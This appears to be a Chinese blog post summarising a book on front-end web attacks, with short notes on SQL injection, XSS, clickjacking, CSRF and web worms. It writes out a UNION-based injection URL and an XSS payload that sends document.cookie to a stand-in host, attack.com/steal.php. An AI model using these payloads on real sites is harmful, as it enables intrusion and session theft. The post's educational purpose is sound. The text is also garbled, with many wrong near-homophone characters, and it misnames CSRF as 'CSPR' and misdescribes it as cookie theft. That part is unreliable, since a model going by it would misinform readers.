前端 安全 问题

看了一本书《Web前端黑客技术揭秘》，讲了不少的前端安全性问题，这里总结下常见的！不是挨个讲解，只是讲一下概念。

一、SQL注入攻击

一个例子说明一切：

访问：http://www.demo.com/demo.php?id=1  

=> select * from user_table where id=1

访问：http://www.demo.com/demo.php?id=1 union select * from user_table  

=> select * from user_table where id=1 union select * from user_table.

二、XSS跨站脚本攻击

举个例子：

访问：http://www.demo.com/demo.php#document.write("<script/src=www.attack.com/alert.js></script>");

alert.js

new Image().src="http://www.attack.com/steal.php?data="+escape(document.cookie);

就是为了获取珍贵的Cookie，还要注意HttpOnly cookie 的溢出泄露。

三、前端页面劫持

分点击劫持、拖放劫持、触屏劫持三种。

这个道理也很简单，就是讲一个须要用户点击或其余操做的页面使用iframe标签引到当前页面，可是其他部分都被遮挡住，而后只暴露出须要用户点击或其余操做的部分，而且引导用户进行操做。从而得到用户客户端的各类数据，利用数据完成一些操做。

四、CSRF跨站请求伪造

CSPR攻击和XSS攻击的不一样之处在于它是要用户到一个黑客构建好的攻击网站上，从而被得到Cookie。

五、Web蠕虫问题

蠕虫程序就是利用Web2.0用户只交的交流这一个特色作的。

经典例子：某人发表了一个东西，若是另外一个用户发现并点开了。这个蠕虫程序便使用点击人的信息再次发送一条相同信息，依次扩展，指数增加！

用处：对用数据进行恶意操做，拒绝服务攻击，分布式拒绝服务攻击，散播广告，散播网页木马，传播舆情等。

其余：注意同源策略，网络上的信任与不信任，社会工程学的应用。